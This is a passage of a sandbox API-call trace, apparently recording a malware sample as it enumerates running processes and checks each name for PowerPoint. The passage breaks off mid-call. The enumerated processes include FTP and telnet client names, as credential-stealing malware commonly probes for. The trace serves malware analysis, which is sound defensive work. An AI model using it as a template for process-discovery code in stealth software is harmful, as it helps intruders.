(in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0098.930] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="powerpnt") returned 0x0 [0098.930] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0098.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.932] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578ea0 [0098.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3578ea0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0098.932] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0098.932] StrStrIA (lpFirst="pending.exe", lpSrch="powerpnt") returned 0x0 [0098.932] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0098.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0098.933] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356bb68 [0098.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356bb68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0098.933] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0098.933] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="powerpnt") returned 0x0 [0098.933] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0098.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.934] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a378 [0098.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357a378, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0098.934] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0098.934] StrStrIA (lpFirst="swing prefer.exe", lpSrch="powerpnt") returned 0x0 [0098.935] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0098.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0098.936] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b9b0 [0098.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356b9b0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0098.936] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0098.936] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="powerpnt") returned 0x0 [0098.936] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0098.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.937] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a1b8 [0098.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357a1b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0098.937] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0098.937] StrStrIA (lpFirst="nights-attending.exe", lpSrch="powerpnt") returned 0x0 [0098.937] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0098.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.939] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578f00 [0098.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3578f00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0098.939] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0098.939] StrStrIA (lpFirst="installed.exe", lpSrch="powerpnt") returned 0x0 [0098.939] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0098.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0098.940] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356baf0 [0098.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356baf0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0098.940] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0098.940] StrStrIA (lpFirst="references compounds.exe", lpSrch="powerpnt") returned 0x0 [0098.940] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0098.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.942] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a398 [0098.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357a398, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0098.942] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0098.942] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="powerpnt") returned 0x0 [0098.942] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0098.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.943] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a238 [0098.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357a238, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0098.943] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0098.943] StrStrIA (lpFirst="registered try.exe", lpSrch="powerpnt") returned 0x0 [0098.943] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0098.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0098.945] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b960 [0098.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356b960, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0098.945] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0098.945] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="powerpnt") returned 0x0 [0098.945] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0098.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.946] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578f18 [0098.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3578f18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0098.946] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0098.946] StrStrIA (lpFirst="invite.exe", lpSrch="powerpnt") returned 0x0 [0098.946] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0098.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.948] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3578f30 [0098.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3578f30, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0098.948] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0098.948] StrStrIA (lpFirst="idol.exe", lpSrch="powerpnt") returned 0x0 [0098.948] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0098.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0098.949] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b8c0 [0098.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356b8c0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0098.949] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0098.949] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="powerpnt") returned 0x0 [0098.949] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0098.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.951] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356bcf8 [0098.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356bcf8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0098.951] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0098.951] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="powerpnt") returned 0x0 [0098.951] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0098.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.952] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3578e28 [0098.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3578e28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0098.952] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0098.952] StrStrIA (lpFirst="powell_jane.exe", lpSrch="powerpnt") returned 0x0 [0098.952] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0098.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.953] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a0b8 [0098.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357a0b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0098.953] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0098.954] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="powerpnt") returned 0x0 [0098.954] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0098.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0098.955] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3578f48 [0098.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3578f48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0098.955] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0098.955] StrStrIA (lpFirst="gainedshape.exe", lpSrch="powerpnt") returned 0x0 [0098.955] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0098.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.962] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a438 [0098.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357a438, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0098.963] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0098.963] StrStrIA (lpFirst="opens-versions.exe", lpSrch="powerpnt") returned 0x0 [0098.963] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0098.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0098.964] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356bc30 [0098.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356bc30, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0098.964] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0098.964] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="powerpnt") returned 0x0 [0098.964] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0098.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.965] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578e70 [0098.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3578e70, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0098.965] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0098.965] StrStrIA (lpFirst="3dftp.exe", lpSrch="powerpnt") returned 0x0 [0098.965] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0098.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.967] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a0d8 [0098.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357a0d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0098.967] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0098.967] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="powerpnt") returned 0x0 [0098.967] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0098.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.968] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3578cc0 [0098.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3578cc0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0098.968] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0098.968] StrStrIA (lpFirst="alftp.exe", lpSrch="powerpnt") returned 0x0 [0098.968] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0098.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, 